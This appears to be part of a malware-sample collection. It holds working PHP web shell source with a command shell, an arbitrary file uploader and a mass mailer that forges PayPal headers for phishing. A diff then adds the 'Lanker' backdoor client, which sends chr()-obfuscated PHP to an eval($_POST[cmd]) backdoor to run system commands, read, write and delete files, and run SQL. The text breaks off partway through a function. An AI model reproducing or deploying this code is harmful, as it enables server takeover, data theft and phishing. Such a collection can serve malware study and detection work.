$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
echo '<xml version="1.0" encoding="UTF-8">';
echo '<html><head><title>'.$Title.' PHPShell</title>';
echo $GraphicHeader;
?>
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
<? echo $SiteHeader; ?>
<body onload="init()">
<?php
error_reporting (E_ALL);
if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;
?>
<div id="unCenterShell"><div class="Marged"><div class="Table">
<center><div>Current Directory: <?php echo $_SESSION['cwd'] ?></div></center>
</div></div></div>
<div id="unCenterShell"><div class="Marged"><div class="Table"><center>
<div><form name="shell" action="<?php echo $_SERVER['PHP_SELF'] .'?PHPShell'?>" method="post"></div>
<div><textarea class="Input" name="output" readonly="readonly" cols="68" rows="<?php echo $_REQUEST['rows'] ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea></div>
<div>$&nbsp;&nbsp;<input class="Input" name="command" type="text" onkeyup="key(event)" size="89" tabindex="1"><div>
</center></div></div></div>
<div id="unCenter"><div class="Marged"><div class="Table"><center>
<div><input type="submit" value="Execute Command" />&nbsp;<input type="submit" name="reset" value="Reset" /></div>
<div>Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" /></div>
</form></center></div></div></div>
<? echo $GraphicFooter; }
if(isset($_GET['Uploader'])){
echo '<html><head><title>'.$Title.' Uploader</title>';
echo $GraphicHeader; echo $SiteHeader;
if(isset($_POST['upl_files'])){
echo '<div id="unCenter"><div class="Marged"><div class="Table">
<div>Uploaded Files:<br></div>';
//print_r($_FILES['file_n']);
$up_mas = $_FILES['file_n'];
$mas_name = array();
$mas_tmp = array();
for($i=0; $i<10; $i++){
if(!empty($up_mas['name'][$i])){
$j = count($mas_name);
$mas_name[$j] = $up_mas['name'][$i];
$mas_tmp[$j] = $up_mas['tmp_name'][$i];
}
}
for($i=0; $i<count($mas_name); $i++){
$upl_file = $_POST['mas_dir'].$mas_name[$i];
if(move_uploaded_file($mas_tmp[$i], $upl_file)){
echo '<a href="'.$mas_name[$i].'">'.$mas_name[$i].'</a>,&nbsp';
}
}
}
echo "</div></div></div>";
?>
<div id="unCenter"><div class="Marged"><div class="Table"><center><br>
<form enctype="multipart/form-data" method="post" action="">
<div>Upload Files to:
<? echo'<input class="input" type="text" name="mas_dir" value='.getcwd().$Slash.' size="40"><br><br>'; ?>
<? for($i=0; $i<10; $i++){ echo '<div><input class="Input" type="file" name="file_n[]"></div>'; } ?>
</div><div><input type="reset" name="reset" value="Reset">&nbsp;<input type="submit" name="upl_files" value="upload"></div>
</center></div></div></div>
<? echo $GraphicFooter; }
if(isset($_GET['MainPage'])){
echo '<html><head><title>'.$Title.'</title>';
echo $GraphicHeader; echo $SiteHeader;
print "<div id=unCenterHeader><div class=TableHeader>";
print((@ini_get('safe_mode'))?("<b>Safe Mode: <font color=green>ON</font><b>"):("<b>Safe Mode: <font color=red>OFF</font>"));
print "</b><span class=BlackRealy> | </span>";
print "<b>PHP version: <font color=green>".@phpversion()."</font></b>";
print "<span class=BlackRealy> | </span>";
print((@function_exists('curl_version'))?("<b>cURL: <font color=green>ON</font>"):("<b>cURL: <font color=red>OFF</font>"));
print "</b><span class=BlackRealy> | </span>";
if(@function_exists('mysql_connect')){ echo "<b>MySQL: <font color=green>ON</font>"; } else { echo "<b>MySQL: <font color=red>OFF</font>"; }
print "</b><span class=BlackRealy> | </span>";
if(@function_exists('mssql_connect')){ echo "<b>MSSQL: <font color=green>ON</font>"; } else { echo "<b>MSSQL: <font color=red>OFF</font>"; }
print "</b><span class=BlackRealy> | </span>";
if(@function_exists('pg_connect')){ echo "<b>PostgreSQL: <font color=green>ON</font>"; } else { echo "<b>PostgreSQL: <font color=red>OFF</font>";}
print "</b><span class=BlackRealy> | </span>";
if(@function_exists('ocilogon')){ echo "<b>Oracle: <font color=green>ON</font>"; } else { echo "<b>Oracle: <font color=red>OFF</font>"; }
print "</b></b></div></div>";
echo<<<MainPageGraphic
<div id="unCenter">
<div class="Marged">
<div class="Table">
<center>
<div></div>
<div><a href="?ProxyDetect">ProxyDetect</a></div>
<div><a href="?Uploader">FileUploader</a></div>
<div><a href="?PHPShell">PHPShell</a></div>
<div><a href="?PortCheck">PortCheck</a></div>
<div><a href="?Mailer">MassMailer</a></div>
<div><hr width="150px" size="1px" noshade="noshade"></div>
<div><a href="?DeleteMe">Delete me</a></div>
</center>
</div>
</div>
</div>
MainPageGraphic;
echo $GraphicFooter; }
if(isset($_GET['PortCheck'])) {
echo '<html><head><title>'.$Title.' PortCheck</title>';
echo $GraphicHeader; echo $SiteHeader;
echo "<div id=\"unCenter\"><div class=\"Marged\"><div class=\"Table\" style=\"padding-left: 20\">";
echo "<div align=\"center\">Under Reconstruction</div>";
echo "</div></div></div>";
echo $GraphicFooter;
}
if(isset($_GET['Mailer'])) {
echo '<html><head><title>'.$Title.' Mailer</title>';
echo $GraphicHeader;
echo $SiteHeader;
if(!$action) $action = "";
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<!-- Mailer -->
<form name="Mailer" method="post" action="<? echo $_SERVER['PHP_SELF'] . '?Mailer' ?>" enctype="multipart/form-data">
<div id="unCenterMailer"><div class="Marged"><div class="Table">
<div align="left">
<div style="padding-left: 20px;">Your Email: <input class="input" type="text" name="from" value="<?=$from?>" size="20">
<span style="padding-left: 122px;"></span>Your Name: <input class="input" type="text" name="realname" value="<?=$realname?>" size="20"></div>
<div style="padding-left: 26px;">Reply-To: <input class="input" type="text" name="replyto" value="<?=$replyto?>" size="20">
<span style="padding-left: 123px;"></span>Attach File: <input class="input" type="file" name="file" size="20"></div>
<div style="padding-left: 33px;">Subject: <input class="input" type="text" name="subject" value="<?=$subject?>" size="90"></div>
</div>
<div align="left"><span style="padding-left: 4px;"></span>Letter:<span style="padding-left: 392px;"></span>Recipients:</div>
<div><textarea class="input" name="message" cols="50" rows="10"><?=$message?></textarea>
<textarea class="input" name="emaillist" cols="25" rows="10"><?=$emaillist?></textarea></div>
</div></div></div>
<div id="unCenter"><div class="Marged"><div class="Table">
<div align="center"><input type="radio" name="contenttype" value="plain">Plain
<input type="radio" name="contenttype" value="html" checked>HTML
<input type="hidden" name="action" value="send"><input class="input" type="submit" value="Send eMails"></div>
</div></div></div></form>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
echo '<div id="unCenter"><div class="Marged"><div class="Table"><center>
<div>Please complete all fields before sending your message.</div>
</center></div></div></div>';
echo $GraphicFooter;
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
If ($file_name){
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
echo '<div id="unCenter"><div class="Marged"><div class="Table"><center>';
$messid = "1140150615.28818";
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending: [ $to ] ";
flush();
$header = "From: $realname <$from>\r\n";
$header .= "Reply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Message-Id:<$messid@paypal.com>\r\n";
$header .= "Return-Path: <service@paypal.com>\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "........Success!<br>";
flush();
}
}
echo "</center></div></div></div>";
}
?>
<!-- </Mailer> -->
<? echo $GraphicFooter; } ?>
<? if(isset($_GET['DeleteMe'])){
echo '<html><head><title>'.$Title.' DeleteMe</title>';
echo $GraphicHeader; echo $SiteHeader;
$del = $_GET['del'];
if($del=="TRUE"){
$url = "http://" .$_SERVER['HTTP_HOST']. "/";
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0; URL= $url \">";
unlink('kscr.php');
}
?>
<div id="unCenter"><div class="Marged"><div class="Table">
<center><div></div>
<div style="font-size 10px: bold; font-weight: bold;">Delete Me?</div>
<br><div><a href="?DeleteMe&del=TRUE">Yes (Delete)</a><img src="" border="0" height="0" width="50"><a href="?MainPage">No (Go Home)</a></div>
</center></div></div></div>
<? echo $GraphicFooter; } ?>
<? if(isset($_GET['ProxyDetect'])){
echo $GraphicHeader; echo $SiteHeader;
echo '<html><head><title>'.$Title.' ProxyDetect</title>';
?>
<div id="unCenterProxy"><div class="Marged"><div class="Table">
<div class="Menu" align=center><b><u>Your IP Address:</u></b><br><br></div>
<?
$proxy = "";
$viaproxy = "";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $proxy = TRUE;
if($proxy) $viaproxy = "Via Proxy";
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$ip = getenv("REMOTE_ADDR");
if($host==$ip) $host = "N/A";
echo "<div align=center ><b>".$ip." (".$host.")</b>".$viaproxy."</div>";
?>
<hr size=1 width=80%><br>
<div class=Menu align=center><b><u>Your HTTP Headers:</u></b><br><br/></div>
<div align="left" style="padding-left: 10px">
<?
if(!empty($_SERVER['HTTP_CONNECTION'])) echo "<li> <span style=\"color: Black;\">HTTP_CONNECTION: </span><b>".$_SERVER['HTTP_CONNECTION']."</b><br>";
if(!empty($_SERVER['HTTP_KEEP_ALIVE'])) echo "<li> <span style=\"color: Black;\">HTTP_KEEP_ALIVE: </span><b>".$_SERVER['HTTP_KEEP_ALIVE']."</b><br>";
if(!empty($_SERVER['HTTP_ACCEPT'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT: </span><b>".$_SERVER['HTTP_ACCEPT']."</b><br>";
if(!empty($_SERVER['HTTP_ACCEPT_CHARSET'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_CHARSET: </span><b>".$_SERVER['HTTP_ACCEPT_CHARSET']."</b><br>";
if(!empty($_SERVER['HTTP_ACCEPT_ENCODING'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_ENCODING: </span><b>".$_SERVER['HTTP_ACCEPT_ENCODING']."</b><br>";
if(!empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_LANGUAGE: </span><b>".$_SERVER['HTTP_ACCEPT_LANGUAGE']."</b><br>";
if(!empty($_SERVER['HTTP_HOST'])) echo "<li> <span style=\"color: Black;\">HTTP_HOST: </span><b>".$_SERVER['HTTP_HOST']."</b><br>";
if(!empty($_SERVER['HTTP_USER_AGENT'])) echo "<li> <span style=\"color: Black;\">HTTP_USER_AGENT: </span><b>".$_SERVER['HTTP_USER_AGENT']."</b><br>";
if($proxy) echo "<li> <span style=\"color: Black;\">HTTP_X_FORWARDED_FOR: </span><b>".$_SERVER['HTTP_X_FORWARDED_FOR']."</b><br>";
if (($proxy) && (!empty($_SERVER['HTTP_VIA']))){ echo "<li> <span style=\"color: Black;\">HTTP_VIA: </span><b>".$_SERVER['HTTP_VIA']."</b><br>"; }
?>
</div></div></div></div>
<? echo $GraphicFooter; } exit;?>

295
PHP/Backdoor.PHP.Lanker.a Normal file
View File

@ -0,0 +1,295 @@
<HTML><HEAD>
<!-- codz by Lanker(QQ:18779569)、孟兄(QQ:80607005) 2004/12/22-->
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<style>
<!--
td {font-size:8pt; color: #666666;font-family:Verdana}
INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
BODY {font-size:9pt; color: #666666;font-family:Verdana; SCROLLBAR-FACE-COLOR: #ffffff; background color:#eeeeee;cursor:SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #aaaaaa; SCROLLBAR-3DLIGHT-COLOR: #aaaaaa; SCROLLBAR-ARROW-COLOR: #dddddd; SCROLLBAR-TRACK-COLOR: #ffffff; SCROLLBAR-DARKSHADOW-COLOR: #ffffff }
a:link {text-decoration:none; color:#336699}
a:visited {text-decoration:none; color:#336699}
a:active {text-decoration:none; color:#336699}
a:hover {COLOR: #b4c8d8; }
.tb {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#cccccc}
.tb0 {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#fcfcfc}
.tb1 {background-color:#ffffff} </style>
-->
</STYLE>
</HEAD>
<BODY style="FONT-SIZE: 9pt" bgcolor="#cccccc">
<CENTER style="cursor:hand;">
<font color="#000080">
lanker微型<FONT color=#ff3300>PHP</font>后门客户端2.0正式版</font>
</CENTER>
<hr size="1" color="#000080">
<FORM ENCTYPE="multipart/form-data" name=frm method=post target=qq2>
<TABLE style="FONT-SIZE: 9pt">
<TD width=800 height=10>木马地址: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=85 value=http://127.0.0.1/door.php name=act> 密码: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=20 value=cmd name=para><input type=hidden name='tmpcmd'></TD></TABLE>
<TABLE width=750 >
<TD bgcolor=#ffffff><TABLE style="FONT-SIZE: 9pt" ><tr width=200 height=10>
<select onchange="showDiv(this.value);">
<option value="digest" >----基本功能列表----</option>
<option value="1" >PHP环境变量</option>
<option value="2" >本程序目录</option>
<option value="3" >执行CMD命令</option>
<option value="6" >读取目录</option>
<option value="14" >创建目录</option>
<option value="15" >删除目录</option>
<option value="4" >上传文件</option>
<option value="5" >读取文件</option>
<option value="12" >创建文件</option>
<option value="7" >复制文件</option>
<option value="8" >重命名文件</option>
<option value="9" >删除文件</option>
<option value="13" >下载文件</option>
<option value="11" >执行SQL语句</option>
<option value="10" >专家模式(自己写代码)</option>
</select></tr><tr height=260><TD id="yunxing" >LANKER微型PHP后门服务端代码<br>&lt;?php eval($_POST[cmd])?><hr size="1" color="#000080"><br>容错代码为:<br>&lt;?php @eval($_POST[cmd])?><TD></tr></TABLE></td><td><TABLE style="FONT-SIZE: 9pt"><IFRAME border=1 height=340 width=580 name=qq2 marginwidth=0 marginheight=0 vspace=0
src="about:blank"
frameborder=no scrolling=auto name=ifff value="fdsadfas"></IFRAME></TABLE></td></table>
</form>
<hr size="1" color="#000080">
<CENTER>
<center><font class=font>PHP soft Web Shell v2.0<br>
-------------Code By <FONT color=#ff3300>lanker</font>、<FONT color=#ff3300>孟兄</font> ----------- <br><FONT color=#ff3300>声明:请勿使用本程序从事非法行为,否则后果自负!</font></center>
</BODY></HTML>
<script language="javascript">
function showDiv(aa){
switch(aa)
{
case "1":
yunxing.innerHTML="PHP环境变量<br>"
yunxing.innerHTML+="<p align='center'><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"phpinfo();\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "2":
yunxing.innerHTML="<p align='center'>本程序目录<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"echo dirname(__FILE__);\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "3":
yunxing.innerHTML="<p align='center'><INPUT size=24 name=\"aaaa\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;cmd();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "4":
yunxing.innerHTML="<p align='center'><input NAME='LanKerF' TYPE='file' size=13><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"if (copy($_FILES[LanKerF][tmp_name],$_FILES[LanKerF][name])) echo OK;\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "5":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send> <br><br><br><br><br><br><br><br><br><br>"
break;
case "6":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "7":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;copyfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "8":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;renamefile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "9":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;delfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "10":
yunxing.innerHTML="<p align='center'><textarea rows='17' name='duqu' cols='22'>phpinfo();</textarea>"
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=frm.duqu.value;frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
break;
case "11":
yunxing.innerHTML="主机:<input NAME=\"servername\" TYPE=\"text\" value=\"localhost\" size=\"12\" ><BR>数据库:<input NAME=\"dbname\" TYPE=\"text\" value size=\"10\" > &nbsp;<BR>用户名:<input NAME=\"dbusername\" TYPE=\"text\" value=\"root\" size=\"10\" >&nbsp; <BR>密码:<input NAME=\"dbpassword\" TYPE=\"text\" value size=\"12\" > &nbsp; <BR>SQL语句:<BR><textarea rows=\"8\" name=\"sql\" cols=\"20\" ></textarea>"
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;SQL();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
break;
case "12":
yunxing.innerHTML="<p align='center'>文件名:<INPUT size=14 name=\"filen\"><br>文件内容:<BR><textarea rows=\"16\" name=\"filec\" cols=\"20\" >注意:不支持中文字符!</textarea><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "13":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;downfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "14":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "15":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;rmdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
}
}
function cmd(){
frm.tmpcmd.value="$cmd="
frm.tmpcmd.value+=duqu(frm.aaaa.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="echo chr(60).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="@system($cmd);\n"
frm.tmpcmd.value+="echo chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
}
function readfile(){
frm.tmpcmd.value="$filename="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="$fp=@fopen($filename,r);\n"
frm.tmpcmd.value+="$contents=@fread($fp, filesize($filename));\n"
frm.tmpcmd.value+="@fclose($fp);\n"
frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n"
frm.tmpcmd.value+="echo $s.$contents.$e;\n"
}
function readdir(){
frm.tmpcmd.value="$dir="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="$dir=@dir($dir);"
frm.tmpcmd.value+="if($dir) "
frm.tmpcmd.value+="{"
frm.tmpcmd.value+=" echo path_______.$dir->path.$f;"
frm.tmpcmd.value+=" while($entry=$dir->read())"
frm.tmpcmd.value+=" {"
frm.tmpcmd.value+=" echo ____.$entry.$f; "
frm.tmpcmd.value+=" }"
frm.tmpcmd.value+=" $dir->close();"
frm.tmpcmd.value+="}"
frm.tmpcmd.value+="else"
frm.tmpcmd.value+="{echo 0;}"
}
function SQL(){
frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\n"
frm.tmpcmd.value+="$fgf=chr(32);\n"
frm.tmpcmd.value+="$servername="
frm.tmpcmd.value+=duqu(frm.servername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbusername="
frm.tmpcmd.value+=duqu(frm.dbusername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbpassword="
frm.tmpcmd.value+=duqu(frm.dbpassword.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbname="
frm.tmpcmd.value+=duqu(frm.dbname.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$sql="
frm.tmpcmd.value+=duqu(frm.sql.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="@mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n"
frm.tmpcmd.value+="@mysql_select_db($dbname) or die($message);\n"
frm.tmpcmd.value+="$result = @mysql_query($sql);\n"
frm.tmpcmd.value+="if($result){\n"
frm.tmpcmd.value+="echo SQL语句成功执行;}\n"
frm.tmpcmd.value+="else{echo 失败.mysql_error();}\n"
frm.tmpcmd.value+="mysql_close();"
}
function createfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$filec="
frm.tmpcmd.value+=duqu(frm.filec.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$a=chr(119);\n"
frm.tmpcmd.value+="$fp=@fopen($filen,$a);\n"
frm.tmpcmd.value+="$msg=@fwrite($fp,$filec);\n"
frm.tmpcmd.value+="if($msg) echo chr(79).chr(75).chr(33);\n"
frm.tmpcmd.value+="@fclose($fp);\n"
}
function copyfile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@copy($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
function renamefile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@rename($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
function downfile(){
frm.tmpcmd.value="$df="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$f=chr(46);"
frm.tmpcmd.value+="$h=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(116).chr(121).chr(112).chr(101).chr(58).chr(32).chr(97).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(47).chr(120).chr(45);\n"
frm.tmpcmd.value+="$h1=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(68).chr(105).chr(115).chr(112).chr(111).chr(115).chr(105).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(97).chr(116).chr(116).chr(97).chr(99).chr(104).chr(109).chr(101).chr(110).chr(116).chr(59).chr(32).chr(102).chr(105).chr(108).chr(101).chr(110).chr(97).chr(109).chr(101).chr(61);\n"
frm.tmpcmd.value+="$h2=(68).chr(101).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(80).chr(72).chr(80).chr(51).chr(32).chr(71).chr(101).chr(110).chr(101).chr(114).chr(97).chr(116).chr(101).chr(100).chr(32).chr(68).chr(97).chr(116).chr(97);\n"
frm.tmpcmd.value+="$fn = basename($df);\n"
frm.tmpcmd.value+="$fe = $finfo[count($finfo)-1];\n"
frm.tmpcmd.value+="$finfo = explode($f, $fn);\n"
frm.tmpcmd.value+="header($h.$fe);\n"
frm.tmpcmd.value+="header($h1.$fn);\n"
frm.tmpcmd.value+="header($h2);\n"
frm.tmpcmd.value+="@readfile($df);\n"
frm.tmpcmd.value+="header($h2);\n"
frm.tmpcmd.value+="exit;\n"
}
function delfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@unlink($filen)) echo chr(79).chr(75).chr(33);"
}
function createdir(){
frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@mkdir($dirs,0777)) echo chr(79).chr(75).chr(33);"
}
function rmdir(){
